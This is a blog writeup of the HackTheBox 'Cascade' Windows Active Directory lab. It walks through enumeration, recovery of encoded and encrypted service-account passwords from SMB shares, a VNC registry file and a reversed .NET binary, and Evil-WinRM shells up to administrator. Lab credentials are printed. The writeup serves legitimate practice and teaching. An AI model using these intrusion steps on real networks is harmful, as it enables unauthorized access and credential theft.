HackTheBox Cascade Writeup – 10.10.10.182

HackTheBox Cascade Writeup – 10.10.10.182

HackTheBox Cascade (10.10.10.182) is a recent Windows box by VbScrub. Like previous Windows machines, a bunch of very well-known tools can exploit the Cascade until you get the User. Once you get the user the methodology changes completely. This is the first time I used SQLite database in HTB in a windows box. The initial foothold could be a bit tricky, but worth the efforts!. If you are into Windows business, then it is like reviewing your expertise and for Linux guys it is a great learn to hack Windows AD infra.

The Cascade box is all about Enumeration, Getting right users from AD, finding their password, decrypting, reading the directories from SMB, reading registry, finding the way to decrypt another password using the right tools. The RE is something I always hate, but to find your way in its mandatory to RE the binary file and get the Keys to unlock the main door.

So, lets get started.

Enumeration

Like every other machines I add the machine IP 10.10.10.182 to my hots file as cascade.htb and fired up my terminal and proceed to NMAP scan.

# root @ ns09 in ~/htb/cascade [19:34:46] 
$ nmap -sV -p- -oA cascade.nmap cascade.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-30 19:59 +03
Nmap scan report for cascade.htb (10.10.10.182)
Host is up (0.14s latency).
Not shown: 65520 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-30 17:08:38Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 580.49 seconds

# root @ ns09 in ~/htb/cascade [20:08:56]

OK, here we have commonly known Windows AD, Windows Kerberos, SMB ports are wide open. I’m not interested in all the open holes, I decided to run Enum4Linux a great Windows enumeration tool available in Kali Linux.

Initially I run the full Enum4Linux, but I was overwhelmed by the information being returned by the machine, so I run the tool again to get the available users.

We have total 15 users in the box.

user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]

In the next step, I used Impacket LDAPSerach tool to gather as much as information from the Cascade AD. As you may already know LDAPSerach return a huge amount of data, so it is always a best-practice to export the results into an external file.

So, here is what I was looking for I have the credential for the user R.Thompson.

However, the password is encoded in Base64, a simple decoding from Kali exposes the real password.

The exposed credentials: r.thompson@cascade.local:rY4n5eva

In the next step, I tried to open SMB using the user R.Thompson and I did the right thing.

I took a while and proceeded to enumerate the directories one by one. Since IT was the low hanging fruit, I started with IT directory.

An Email:

This email says, that they had a TempAdmin user which was created and has the same login credentials as the System Administrator. It means, I will have to find the password of TempAdmin in order to have System Administrator password.

A piece of Log from ArkAdRecycleBin. This log shows a service account user ArkSvc deleting two users “test” and “TempAdmin” – Well, that’s interesting, the email and this log has something to do in the later steps.

# root @ ns09 in ~/htb/cascade [21:22:30] 
$ cat ArkAdRecycleBin.log
1/10/2018 15:43	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43	[MAIN_THREAD]	Validating settings...
1/10/2018 15:43	[MAIN_THREAD]	Error: Access is denied
1/10/2018 15:43	[MAIN_THREAD]	Exiting with error code 5
2/10/2018 15:56	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56	[MAIN_THREAD]	Validating settings...
2/10/2018 15:56	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
2/10/2018 15:56	[MAIN_THREAD]	Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Exiting with error code 0	
8/12/2018 12:22	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22	[MAIN_THREAD]	Validating settings...
8/12/2018 12:22	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
8/12/2018 12:22	[MAIN_THREAD]	Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Exiting with error code 0
# root @ ns09 in ~/htb/cascade [21:22:35] 

There is another log file under DCs “dcdiag.log” that shows the logs of testing the connectivity between another domain controller “CASC-DC1”.

After a while, I found a registry entry in the user directory in \IT\Temp\s.smith\VNC Install.reg. I downloaded it and cat it to find password in a hex value.

I tried to decode using online HEX decoders but it didn’t take long for me to understand the hex is not regular windows hex but VNC Encrypted Password. I found this tool online that claims to decoded VNC encryptions.

And the password was successfully decrypted:

Getting The Shell Using Evil-WinRM and Getting The User.txt

So the next step is straightforward. I used the Evil-WinRM to get PowerShell shell on the box.

HackTheBox Cascade Writeup – Getting The Shell Using Evil-WinRM and Getting The User.txt

From the User S.Smith I run the whoami /all and noticed the new share: “Audit

I used the SMBClient to list the share and here is what it looked like:

# root @ ns09 in ~/htb/cascade [22:06:13] 
$ smbclient //cascade.htb/Audit$ -U s.smith
Enter WORKGROUP\s.smith's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jan 29 21:01:26 2020
  ..                                  D        0  Wed Jan 29 21:01:26 2020
  CascAudit.exe                       A    13312  Wed Jan 29 00:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 21:00:20 2020
  DB                                  D        0  Wed Jan 29 00:40:59 2020
  RunAudit.bat                        A       45  Wed Jan 29 02:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 09:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 09:38:38 2019
  x64                                 D        0  Mon Jan 27 01:25:27 2020
  x86                                 D        0  Mon Jan 27 01:25:27 2020

		13106687 blocks of size 4096. 7793827 blocks available
smb: \> 

The newly found directory contains an exe file, some x64, x86 dlls, a windows bat file, SQLite database and SQLite DLL files.

I download everything from the share to my Kali and then transferred it to my Windows Host machine.

I opened the database Audit.db using EditPlus (the first tool I love to use before I use anything ) and surprisingly I saw an encrypted password of the user “ArkSvc“.

ArkSvcBQO5l5Kj9MdErXx6Q6AGOw==cascade.local

Reverse Engineering Using dnSpy

As per the forum and VBScrub, the process as well involved RE the bin file “CascAudit.exe”. I opened the file using my favourite dnSpy. After going through the disassembler I found a decrypt key in the MainModule.

Going further, I opened the CascCrypty.dll and noticed the Encryption used was AES and inside the Crypto class, found the Decrypting key and the concrete proof that the encryption was AES 128. Now its clear that ArkSvc password is encrypted with AES128, I’m going to find some tools to decrypt.

There are a lot of AES128 decrypted online, I used this.

And we have the password.

Getting The Shell As ArcSvc Using Evil-WinRM


# root @ ns09 in ~/htb/cascade [10:46:16] 
$ ruby evil-winrm.rb -i cascade.htb -u ArkSvc -p w3lc0meFr31nd

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami /all

USER INFORMATION
----------------

User Name      SID                                           
============== ==============================================
cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes                                                     
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group             
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group             
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group             
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group             
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                                                                   

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\arksvc\Documents> 

The privilege shows the user ArkSvc has access to a share AD Recycle Bin.

Straight To The Root

Its pretty straightforward in PowerShell to pull objects from AD Recycle Bin. Running the PowerShell script I found objects in the AD recycle Bin. Where I found deleted TempAdmin user. This was mentioned in the mail document found in the R. Thompson’s directory. The user TempAdmin has the same password as System Administrator.

The password was Base64 encrypted, I decrypted it from my Kali terminal.

# root @ ns09 in ~/htb/cascade [11:30:44] 
$ echo YmFDVDNyMWFOMDBkbGVz | base64 -d
baCT3r1aN00dles#                                                                                                                                                                                                   
# root @ ns09 in ~/htb/cascade [11:31:02] 

I used the Evil-WinRM 4th time and here I owned the Cacade

Thank you for reading. It was a great machine, I learned a lot. There were a couple of hiccups but I managed to find the way myself.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
3 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Malfurion
Malfurion
5 months ago

Nice work, finally grabbed the RIGHT hash, weird how the SAM had a different administrator has to what the lsassdump had. Oh well, liver and learn I guess :D. Keep up the hax brother.

Btw, I completely overlooked online decryption, I wrote some C# and decrypted it using the function from the dll. I’m forever over complicating things. Respect man.

trackback
5 months ago

[…] Previous Post Previous post: HackTheBox Cascade Writeup – 10.10.10.182 […]

Sorry, that action is blocked.